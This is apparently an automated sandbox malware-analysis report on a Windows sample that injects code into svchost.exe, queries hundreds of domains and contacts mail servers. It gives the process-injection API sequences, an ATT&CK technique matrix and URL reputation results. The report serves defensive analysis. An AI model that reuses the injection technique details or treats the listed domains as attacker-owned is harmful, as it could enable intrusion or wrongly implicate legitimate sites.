                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: at-shun.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: cjcagent.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: kumaden.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 81.169.145.175 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: daytonir.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: iranytu.net
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 185.42.105.162 80Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: banvari.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 178.249.70.75 80
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 45.142.176.225 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: ccrsi.org
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: snf.it
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: cbaben.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: sinwal.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: likangds.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: h-et-l.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: rkengg.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: madjek.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 103.4.16.43 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: wnit.org
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: captlfix.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: popbook.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: acraloc.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: revoldia.net
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: eos-i.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: amele.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: atb-lit.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: uhsa.edu.ag
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: skgm.ru
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: pleszew.policja.gov.pl
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: icd-host.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 54.212.145.129 80
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 13.56.33.8 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: burstner.ru
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 35.154.163.204 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: xinhui.net
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 86.105.245.69 25
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: aluminox.es
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: ie-roi.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 103.112.69.92 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: mijash3.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: xult.org
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: shanks.co.uk
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 23.239.201.14 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: vivastay.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 49.212.235.175 443Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 59.106.13.169 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: e-asset.net
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 193.70.68.254 80
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 77.72.4.226 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: plaske.ua
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 34.98.99.30 25
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: touchfam.ca
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 94.100.180.31 25
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: indonesiamedia.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 104.21.235.32 25
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: a-domani.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 104.21.235.31 25
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: nettlinx.org
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: softizer.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: rokoron.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: k-nikko.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 172.67.193.133 443Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: www.jroy.net
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: gbp-jp.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: doggybag.org
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: sgk.home.pl
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 18.197.121.220 80
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 148.72.176.26 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: htsmx.net
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 188.114.96.7 80
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 5.181.161.11 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: dwid.de
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: skypearl.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 164.92.82.47 80
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 154.210.36.66 80
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 198.209.253.30 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: esmoke.net
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: 78san.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: simetar.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: btsi.com.ph
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: agulatex.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: gcss.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 64.18.191.61 80
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 79.96.161.192 80
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 185.178.208.141 80
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 172.67.143.148 25Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: alt4.gmail-smtp-in.l.google.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: leapc.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: magicomm.co.uk
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: xsui.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: nolaoig.org
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 172.64.147.213 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: mkm-gr.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: dyag-eng.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: hchc.org
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: webband.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 15.197.204.56 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: keio-web.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 188.114.97.7 25
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: 603888.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 133.242.15.119 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: ascc.org.au
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: canmore.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: pertex.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 94.130.164.242 80
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 35.231.13.148 25
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: rappich.de
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: smtp.mail.yahoo.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: insia.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 3.130.253.23 80
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 202.172.28.89 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: biurohera.pl
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: agitz.com.br
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: sokuwan.net
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: duiops.net
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 52.200.51.73 80Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 31.15.12.103 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: mcseurope.nl
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: orbitgas.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 198.1.81.28 25
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: fogra.com.pl
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: polprime.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: nrsi.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: mondopp.net
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 54.39.198.18 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: deckoviny.cz
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: roewer.de
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 198.54.117.242 25Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: nettle.pl
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: diamir.de
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: www.udesign.biz
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: zugseil.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: jabian.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: smtp.compuserve.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 192.252.159.116 25
                  Source: C:\Users\user\pigalicapi.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 400000Jump to behavior
                  Source: C:\Users\user\pigalicapi.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: AC9008Jump to behavior
                  Source: C:\Users\user\pigalicapi.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 7F6A0000Jump to behavior
                  Source: C:\Users\user\pigalicapi.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 4D6008Jump to behavior
                  Source: C:\Users\user\pigalicapi.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 7F6A0000 protect: page execute and read and writeJump to behavior
                  Source: C:\Users\user\pigalicapi.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 400000 value starts with: 4D5AJump to behavior
                  Source: C:\Users\user\pigalicapi.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 7F6A0000 value starts with: 4D5AJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 7EC60000 value starts with: 4D5AJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 4000000 value starts with: 4D5AJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 13140000 value starts with: 4D5AJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 4000000 value starts with: 4D5AJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 13140000 value starts with: 4D5AJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 4000000 value starts with: 4D5AJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 13140000 value starts with: 4D5AJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 4000000 value starts with: 4D5AJump to behavior
                  Source: C:\Users\user\pigalicapi.exeCode function: 1_2_011720B0 GetEnvironmentVariableA,lstrcatA,lstrcatA,lstrcatA,VirtualAlloc,CreateProcessA,VirtualFree,VirtualAllocEx,VirtualAllocEx,TerminateProcess,CloseHandle,CloseHandle,VirtualFree,WriteProcessMemory,TerminateProcess,CloseHandle,CloseHandle,VirtualFree,VirtualFree,GetThreadContext,TerminateProcess,CloseHandle,CloseHandle,WriteProcessMemory,TerminateProcess,CloseHandle,CloseHandle,SetThreadContext,ResumeThread,TerminateProcess,CloseHandle,CloseHandle,1_2_011720B0
                  Source: C:\Users\user\pigalicapi.exeCode function: 1_2_01172510 VirtualAlloc,VirtualAllocEx,VirtualAllocEx,VirtualFree,WriteProcessMemory,VirtualFree,VirtualFree,CreateRemoteThread,1_2_01172510
                  Source: C:\Users\user\pigalicapi.exeCode function: 3_2_007B2510 VirtualAlloc,VirtualAllocEx,VirtualAllocEx,VirtualFree,WriteProcessMemory,VirtualFree,VirtualFree,CreateRemoteThread,3_2_007B2510
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_04001DC0 VirtualAlloc,VirtualAllocEx,VirtualAllocEx,VirtualFree,WriteProcessMemory,VirtualFree,VirtualFree,CreateRemoteThread,4_2_04001DC0
                  Source: C:\Users\user\Desktop\nhVJ8J5qOt.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exeJump to behavior
                  Source: C:\Users\user\Desktop\nhVJ8J5qOt.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exeJump to behavior
                  Source: C:\Users\user\pigalicapi.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exeJump to behavior
                  Source: C:\Users\user\pigalicapi.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exeJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exeJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exeJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exeJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exeJump to behavior
                  Source: C:\Users\user\Desktop\nhVJ8J5qOt.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Users\user\pigalicapi.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Users\user\pigalicapi.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nhVJ8J5qOt.exeCode function: 0_2_0037E2DE cpuid 0_2_0037E2DE
                  Source: C:\Users\user\Desktop\nhVJ8J5qOt.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                  Source: C:\Users\user\Desktop\nhVJ8J5qOt.exeCode function: 0_2_0037E782 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_0037E782
                  Source: C:\Users\user\pigalicapi.exeCode function: 1_2_01178F80 GetVersionExA,GetSystemInfo,lstrcatA,lstrcatA,lstrcatA,GetSystemMetrics,lstrcatA,GetSystemMetrics,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrlenA,lstrcatA,lstrcatA,lstrlenA,lstrcatA,1_2_01178F80

                  Stealing of Sensitive Information

                  barindex
                  Source: Yara matchFile source: 0.2.nhVJ8J5qOt.exe.1270000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.2.pigalicapi.exe.7b0000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.pigalicapi.exe.1170000.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.svchost.exe.4000000.6.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 4.2.svchost.exe.4000000.5.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.nhVJ8J5qOt.exe.1270000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.2.pigalicapi.exe.7b0000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.pigalicapi.exe.1170000.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.svchost.exe.4000000.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000000.00000002.813790017.0000000001270000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000002.812221032.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000001.00000002.813345942.0000000001170000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                  Valid Accounts2
                  Command and Scripting Interpreter
                  1
                  Windows Service
                  1
                  Windows Service
                  111
                  Masquerading
                  1
                  Input Capture
                  1
                  System Time Discovery
                  Remote Services1
                  Input Capture
                  Exfiltration Over Other Network Medium21
                  Encrypted Channel
                  Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
                  Data Encrypted for Impact
                  Default Accounts4
                  Native API
                  1
                  Registry Run Keys / Startup Folder
                  611
                  Process Injection
                  21
                  Virtualization/Sandbox Evasion
                  LSASS Memory231
                  Security Software Discovery
                  Remote Desktop Protocol11
                  Archive Collected Data
                  Exfiltration Over Bluetooth4
                  Ingress Tool Transfer
                  Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                  Domain AccountsAt (Linux)Logon Script (Windows)1
                  Registry Run Keys / Startup Folder
                  611
                  Process Injection
                  Security Account Manager21
                  Virtualization/Sandbox Evasion
                  SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration4
                  Non-Application Layer Protocol
                  Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                  Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)1
                  Obfuscated Files or Information
                  NTDS2
                  Process Discovery
                  Distributed Component Object ModelInput CaptureScheduled Transfer25
                  Application Layer Protocol
                  SIM Card SwapCarrier Billing Fraud
                  Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
                  Software Packing
                  LSA Secrets1
                  Application Window Discovery
                  SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                  Replication Through Removable MediaLaunchdRc.commonRc.commonSteganographyCached Domain Credentials1
                  Remote System Discovery
                  VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                  External Remote ServicesScheduled TaskStartup ItemsStartup ItemsCompile After DeliveryDCSync1
                  System Network Configuration Discovery
                  Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                  Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem1
                  File and Directory Discovery
                  Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                  Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Masquerading/etc/passwd and /etc/shadow25
                  System Information Discovery
                  Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1266961 Sample: nhVJ8J5qOt.exe Startdate: 05/07/2023 Architecture: WINDOWS Score: 100 55 ymlp15.net 2->55 57 ftchat.com 2->57 59 318 other IPs or domains 2->59 95 Snort IDS alert for network traffic 2->95 97 Antivirus detection for URL or domain 2->97 99 Multi AV Scanner detection for submitted file 2->99 105 3 other signatures 2->105 8 nhVJ8J5qOt.exe 3 68 2->8         started        13 pigalicapi.exe 48 2->13         started        15 pigalicapi.exe 48 2->15         started        signatures3 101 System process connects to network (likely due to code injection or exploit) 57->101 103 Tries to resolve many domain names, but no domain seems valid 57->103 process4 dnsIp5 61 hazmatt.com 8->61 69 192 other IPs or domains 8->69 37 C:\Users\user\pigalicapi.exe, PE32 8->37 dropped 39 C:\Users\...\pigalicapi.exe:Zone.Identifier, ASCII 8->39 dropped 107 Detected unpacking (creates a PE file in dynamic memory) 8->107 109 Drops PE files to the user root directory 8->109 17 svchost.exe 8->17         started        21 svchost.exe 8->21         started        63 komie.com 13->63 71 166 other IPs or domains 13->71 111 Multi AV Scanner detection for dropped file 13->111 113 Machine Learning detection for dropped file 13->113 115 Contains functionality to inject threads in other processes 13->115 127 2 other signatures 13->127 23 svchost.exe 13->23         started        65 www.ottospm.com 15->65 67 yhsll.com 15->67 73 150 other IPs or domains 15->73 117 Writes to foreign memory regions 15->117 119 Allocates memory in foreign processes 15->119 121 Injects a PE file into a foreign processes 15->121 25 svchost.exe 15->25         started        file6 123 Tries to resolve many domain names, but no domain seems valid 65->123 125 System process connects to network (likely due to code injection or exploit) 67->125 signatures7 process8 dnsIp9 41 fifa-ews.com 17->41 43 smtp1.sbc.mail.am0.yahoodns.net 67.195.12.38 YAHOO-GQ1US United States 17->43 51 9 other IPs or domains 17->51 89 System process connects to network (likely due to code injection or exploit) 17->89 91 Contains functionality to inject threads in other processes 17->91 93 Injects a PE file into a foreign processes 17->93 27 svchost.exe 12 17->27         started        31 svchost.exe 12 17->31         started        33 svchost.exe 17->33         started        35 svchost.exe 17->35         started        45 mail.airmail.net 66.226.70.66 INFB2-ASUS United States 21->45 47 s5w.com 21->47 49 smtp.mail.yahoo.com 23->49 53 3 other IPs or domains 23->53 signatures10 process11 dnsIp12 81 139 other IPs or domains 27->81 129 System process connects to network (likely due to code injection or exploit) 27->129 83 71 other IPs or domains 31->83 75 xsui.com 33->75 85 85 other IPs or domains 33->85 77 polprime.com 35->77 79 invictus.pl 35->79 87 269 other IPs or domains 35->87 signatures13 131 Tries to resolve many domain names, but no domain seems valid 79->131

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand
                  SourceDetectionScannerLabelLink
                  nhVJ8J5qOt.exe29%VirustotalBrowse
                  nhVJ8J5qOt.exe29%ReversingLabs
                  nhVJ8J5qOt.exe100%Joe Sandbox ML
                  SourceDetectionScannerLabelLink
                  C:\Users\user\pigalicapi.exe100%Joe Sandbox ML
                  C:\Users\user\pigalicapi.exe29%ReversingLabs
                  No Antivirus matches
                  No Antivirus matches
                  SourceDetectionScannerLabelLink
                  https://www.pcgrate.com/#webpage0%VirustotalBrowse
                  https://pohlfood.com/#website1%VirustotalBrowse
                  https://www.pcgrate.com/#webpage0%Avira URL Cloudsafe
                  http://gpthink.com/product/204.html0%Avira URL Cloudsafe
                  http://www.myropcb.com/wp-content/themes/thematic/library/scripts/supersubs.js0%Avira URL Cloudsafe
                  https://inhouse.pohlfood.com/0%Avira URL Cloudsafe
                  http://dog-jog.net/0%Avira URL Cloudsafe
                  https://pohlfood.com/#website0%Avira URL Cloudsafe
                  http://pohlfood.com/wp-content/plugins/ooohboi-steroids-for-elementor/assets/css/main.css?ver=2.1.500%Avira URL Cloudsafe
                  http://pohlfood.com/wp-content/plugins/woocommerce/assets/js/js-cookie/js.cookie.min.js?ver=2.1.4-wc0%Avira URL Cloudsafe
                  http://www.elpro.si/0%Avira URL Cloudsafe
                  http://univi.it/0%Avira URL Cloudsafe
                  http://pohlfood.com/wp-content/plugins/elementor/assets/js/preloaded-modules.min.js?ver=3.14.10%Avira URL Cloudsafe
                  http://www.stajum.com/M100%Avira URL Cloudmalware
                  http://likangds.com/0%Avira URL Cloudsafe
                  https://www.pwd.org/0%Avira URL Cloudsafe
                  http://www.pcgrate.com/wp-content/plugins/woo-rfq-for-woocommerce/gpls_assets/js/gpls_woo_rfq.js?ver0%Avira URL Cloudsafe
                  http://www.valselit.com/174-appartement-a-vendre-grenoble-30514100%Avira URL Cloudmalware
                  http://sigtoa.com/0%Avira URL Cloudsafe
                  http://www.credo.edu.pl/100%Avira URL Cloudmalware
                  https://www.aevga.com/100%Avira URL Cloudmalware
                  https://pohlfood.com/comments/feed/0%Avira URL Cloudsafe
                  http://www.naoi-a.com/0%Avira URL Cloudsafe
                  http://pohlfood.com/wp-content/plugins/real3d-flipbook/js/flipbook.pdfservice.min.js?ver=3.250%Avira URL Cloudsafe
                  http://www.myropcb.com/services-capabilities/pcb-restoration/0%Avira URL Cloudsafe
                  http://www.abdg.com/0%Avira URL Cloudsafe
                  http://www.pcgrate.com/wp-content/plugins/pro-elements/assets/js/frontend.min.js?ver=3.3.10%Avira URL Cloudsafe
                  http://www.myropcb.com/services-capabilities/stencil/0%Avira URL Cloudsafe
                  http://www.valselit.com/177-appartement-a-vendre-sigean-30378100%Avira URL Cloudmalware
                  http://www.olras.com/N0%Avira URL Cloudsafe
                  http://www.myropcb.com/why-use-myro/0%Avira URL Cloudsafe
                  http://www.pcgrate.com/wp-content/themes/dt-the7/js/main.min.js?ver=9.12.00%Avira URL Cloudsafe
                  http://www.pwd.org/m0%Avira URL Cloudsafe
                  http://gholographic.com/0%Avira URL Cloudsafe
                  http://www.pr-park.com/D(o0%Avira URL Cloudsafe
                  http://pohlfood.com/wp-content/plugins/wc-product-table-pro/assets/css.min.css?ver=2.1.00%Avira URL Cloudsafe
                  http://calvinly.com/0%Avira URL Cloudsafe
                  https://www.ora-ito.com/0%Avira URL Cloudsafe
                  https://tickets.suresupport.com/faq/article-1596/en0%Avira URL Cloudsafe
                  http://www.pcgrate.com/wp-content/plugins/elementor/assets/lib/eicons/fonts/eicons.woff?5.10.0)0%Avira URL Cloudsafe
                  https://www.lrsuk.com/0%Avira URL Cloudsafe
                  http://www.pcgrate.com/wp-content/uploads/the7-css/css-vars.css?ver=899328ee298e0%Avira URL Cloudsafe
                  http://ruzee.com/0%Avira URL Cloudsafe
                  http://www.c9dd.com/.0#0%Avira URL Cloudsafe
                  http://myropcb.com/login/0%Avira URL Cloudsafe
                  https://pohlfood.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fpohlfood.com%2F0%Avira URL Cloudsafe
                  http://www.speelhal.net/e100%Avira URL Cloudmalware
                  http://www.photo4b.com/$0%Avira URL Cloudsafe
                  https://pohlfood.com/wp-content/uploads/iStock-1031193710b.jpg0%Avira URL Cloudsafe
                  http://www.pr-park.com/dual0%Avira URL Cloudsafe
                  http://www.pcgrate.com/wp-content/plugins/woo-discount-rules/v2/Assets/Js/site_main.js?ver=2.3.70%Avira URL Cloudsafe
                  http://pohlfood.com/wp-content/plugins/elementor/assets/lib/font-awesome/js/v4-shims.min.js?ver=3.140%Avira URL Cloudsafe
                  http://www.jenco.co.uk/U0%Avira URL Cloudsafe
                  http://www.mobilnic.net/m0%Avira URL Cloudsafe
                  http://www.myropcb.com/why-use-myro/terms-of-service/0%Avira URL Cloudsafe
                  http://www.pcgrate.com0%Avira URL Cloudsafe
                  http://www.ora-ito.com/0%Avira URL Cloudsafe
                  http://vvsteknik.dk/0%Avira URL Cloudsafe
                  http://www.pcgrate.com/wp-content/plugins/elementor/assets/lib/share-link/share-link.min.js?ver=3.3.0%Avira URL Cloudsafe
                  http://www.yocinc.org/tected_storage0%Avira URL Cloudsafe
                  https://www.naoi-a.com/0%Avira URL Cloudsafe
                  http://arowines.com/0%Avira URL Cloudsafe
                  http://shanks.co.uk/0%Avira URL Cloudsafe
                  http://pohlfood.com/wp-includes/js/dist/vendor/wp-polyfill-inert.min.js?ver=3.1.20%Avira URL Cloudsafe
                  http://www.speelhal.net/Q100%Avira URL Cloudmalware
                  http://www.jenco.co.uk/v0%Avira URL Cloudsafe
                  https://dataform.co.uk/wp-signup.php?new=magicomm.co.uk0%Avira URL Cloudsafe
                  https://www.pcgrate.com0%Avira URL Cloudsafe
                  http://oozkranj.com/0%Avira URL Cloudsafe
                  http://www.ka-mo-me.com/P0%Avira URL Cloudsafe
                  http://www.myropcb.com/wp-content/themes/framePCB/images/shopping_car.png0%Avira URL Cloudsafe
